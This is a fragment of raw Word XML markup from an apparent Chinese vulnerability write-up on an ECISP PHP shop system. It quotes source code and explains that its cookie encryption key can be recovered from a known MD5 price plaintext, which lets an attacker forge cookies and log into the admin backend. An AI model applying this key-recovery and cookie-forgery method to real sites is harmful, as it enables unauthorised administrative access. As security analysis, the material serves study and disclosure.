            <v:rect id="_x0000_s7183" style="position:absolute;left:5806;top:10305;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7182" style="position:absolute;left:5927;top:10305;width:103;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7181" style="position:absolute;left:6030;top:10305;width:1928;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7180" style="position:absolute;left:7958;top:10305;width:103;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7179" style="position:absolute;left:8061;top:10305;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7178" style="position:absolute;left:8182;top:10305;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7177" style="position:absolute" from="1614,10242" to="1614,10568" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s7176" style="position:absolute" from="8364,10242" to="8364,10568" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s7175" style="position:absolute;left:1617;top:10568;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7174" style="position:absolute;left:1797;top:10631;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7173" style="position:absolute;left:2279;top:10631;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7172" style="position:absolute;left:2399;top:10631;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7171" style="position:absolute;left:2520;top:10631;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7170" style="position:absolute;left:2640;top:10631;width:1567;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7169" style="position:absolute;left:4207;top:10631;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7168" style="position:absolute;left:4327;top:10631;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7167" style="position:absolute;left:4448;top:10631;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7166" style="position:absolute;left:4568;top:10631;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7165" style="position:absolute" from="1614,10568" to="1614,10894" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s7164" style="position:absolute" from="8364,10568" to="8364,10894" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s7163" style="position:absolute;left:1617;top:10894;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7162" style="position:absolute;left:1797;top:10957;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7161" style="position:absolute;left:2713;top:10957;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7160" style="position:absolute;left:3629;top:10957;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7159" style="position:absolute;left:4545;top:10957;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7158" style="position:absolute" from="1614,10894" to="1614,11220" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s7157" style="position:absolute" from="8364,10894" to="8364,11220" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s7156" style="position:absolute;left:1617;top:11220;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7155" style="position:absolute;left:1797;top:11283;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7154" style="position:absolute;left:2713;top:11283;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7153" style="position:absolute;left:3629;top:11283;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7152" style="position:absolute;left:4545;top:11283;width:2651;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7151" style="position:absolute;left:7196;top:11283;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7150" style="position:absolute;left:7316;top:11283;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7149" style="position:absolute;left:7437;top:11283;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7148" style="position:absolute" from="1614,11220" to="1614,11546" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s7147" style="position:absolute" from="8364,11220" to="8364,11546" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s7146" style="position:absolute;left:1617;top:11546;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7145" style="position:absolute;left:1797;top:11609;width:1566;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7144" style="position:absolute;left:3363;top:11609;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7143" style="position:absolute;left:3484;top:11609;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7142" style="position:absolute;left:3604;top:11609;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7141" style="position:absolute;left:3725;top:11609;width:1807;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7140" style="position:absolute" from="1614,11546" to="1614,11872" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s7139" style="position:absolute" from="8364,11546" to="8364,11872" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s7138" style="position:absolute;left:1617;top:11872;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7137" style="position:absolute" from="1612,12380" to="8366,12380" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s7136" style="position:absolute" from="1614,11872" to="1614,12383" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s7135" style="position:absolute" from="8364,11872" to="8364,12383" strokecolor="#ccc" strokeweight=".24pt"/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:group>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="234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shape id="_x0000_s7133" type="#_x0000_t202" style="width:337.5pt;height:547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92EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="64" w:line="388" w:lineRule="auto"/>
                    <w:ind w:left="183" w:right="175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'title']</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-50"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>:</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-52"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>"&lt;font</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-52"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>color='"</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-50"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>.</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-52"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w: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'color'] . "'&gt;" . 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'title'] . "&lt;/font&gt;";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7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'amount'] = $amount;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3" w:right="401" w:firstLine="4579"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$countprice = </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>sprintf(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>"%01.2f", $amount * $r</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>sList['bprice']);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ind w:left="1097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rsList[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'countprice'] = $countprice;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:right="180"/>
                    <w:jc w:val="right"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$productmoney =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50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$productmoney + $countprice;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:right="780"/>
                    <w:jc w:val="right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array[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>] =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50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$rsList;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3" w:right="50" w:firstLine="914"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>$this-&gt;fun-&gt;</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>setcookie(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'ecisp_order_productmon </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>ey', $this-&gt;fun-&gt;eccode($productmoney, 'ENCODE', db_pscode), 7200);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3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7" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$this-&gt;</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>pagetemplate-&gt;</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>assign(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'moneytype',</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="124"/>
                    <w:ind w:left="183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CON[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'order_moneytype']);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2931" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$order_discount =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CON[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'order_discount'];</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:left="2931" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$discountmoney = 0;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:left="2931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($order_discount &gt; 0) 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3845" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$discountmoney =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-6"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$productmoney &gt; </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>0 ?</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> $productmoney - ($order_discount /</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:left="183" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>100) * $</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>productmoney :</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> 0;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126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931" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$discount_productmoney =</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="124"/>
                    <w:ind w:left="183" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$productmoney - $discountmoney;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  <w:lang w:eastAsia="zh-C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7132" type="#_x0000_t202" style="width:337.5pt;height:344.2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623" w:firstLine="2748"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$order_integral = </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>empty(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$this-&gt;CON['order_integral']) ? </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>1 :</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> intval($this-&gt;CON['order</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>_integral']);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:ind w:left="1076" w:right="639"/>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$internum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$discount_productmoney * $order_integral;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936" w:firstLine="914"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$this-&gt;pagetemplate-&gt;</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>assign(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'internum', intval($internum));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ind w:left="1076" w:right="761"/>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$payplug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$this-&gt;get_payplug_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1076" w:right="639"/>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$shipplug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$this-&gt;get_shipplug_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 w:line="391" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="50" w:firstLine="2748"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$cookiceprice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md5(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>"</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>$productmoney|$discount_productmoney");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834" w:right="210"/>
                    <w:jc w:val="center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setcookie(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'ecisp_order_sncode',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368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$cookiceprice, 'ENCODE', db_pscode));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2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:before="35" w:line="271" w:lineRule="auto"/>
        <w:ind w:right="352"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>而被加密的明文就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-64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MD5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>过后的购物价格，因此可以还原最长</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-62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32 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>位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MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-59"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s7131" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:16.8pt;width:337.5pt;height:148.05pt;z-index:618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 xml:space="preserve">$arr_purview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'|',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1006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$ecisp_admininfo, 'DECODE', db_pscode));</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="1"/>
                    <w:rPr>
                      <w:rFonts w:ascii="MS Mincho"/>
                      <w:sz w:val="25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 xml:space="preserve">$this-&gt;esp_powerlist = </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>explode(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'|',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247"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$this-&gt;fun-&gt;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$esp_powerlist, 'DECODE'</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>, db_pscode));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在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>经过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上面的步</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>骤还</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-60"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">key </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以后，就可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>伪</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>造</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-57"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>陆</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后台了：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6"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="8"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:pict>
          <v:group id="_x0000_s6898" style="position:absolute;margin-left:80.85pt;margin-top:72.25pt;width:337.25pt;height:555.9pt;z-index:-364744;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordorigin="1617,1445" coordsize="6745,11118">
            <v:rect id="_x0000_s7130" style="position:absolute;left:1617;top:1445;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7129" style="position:absolute;left:1797;top:1688;width:2651;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7128" style="position:absolute;left:4448;top:1688;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7127" style="position:absolute;left:4568;top:1688;width:2410;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7126" style="position:absolute;left:6978;top:1688;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7125" style="position:absolute;left:1617;top:1951;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7124" style="position:absolute;left:1797;top:2014;width:2410;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7123" style="position:absolute;left:4207;top:2014;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7122" style="position:absolute;left:4327;top:2014;width:2531;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7121" style="position:absolute;left:6858;top:2014;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7120" style="position:absolute;left:1617;top:2277;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7119" style="position:absolute;left:1797;top:2340;width:1566;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7118" style="position:absolute" from="3403,2340" to="3403,2540" strokecolor="#f8f8f8" strokeweight="4pt"/>
            <v:rect id="_x0000_s7117" style="position:absolute;left:3443;top:2340;width:2169;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7116" style="position:absolute" from="5652,2340" to="5652,2540" strokecolor="#f8f8f8" strokeweight="4pt"/>
            <v:rect id="_x0000_s7115" style="position:absolute;left:5692;top:2340;width:2289;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s7114" style="position:absolute" from="8021,2340" to="8021,2540" strokecolor="#f8f8f8" strokeweight="4pt"/>
            <v:rect id="_x0000_s7113" style="position:absolute;left:8061;top:2340;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7112" style="position:absolute;left:8182;top:2340;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7111" style="position:absolute;left:1617;top:2603;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7110" style="position:absolute;left:1797;top:2666;width:1566;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7109" style="position:absolute;left:1617;top:2929;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s7108" style="position:absolute;left:1617;top:3255;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
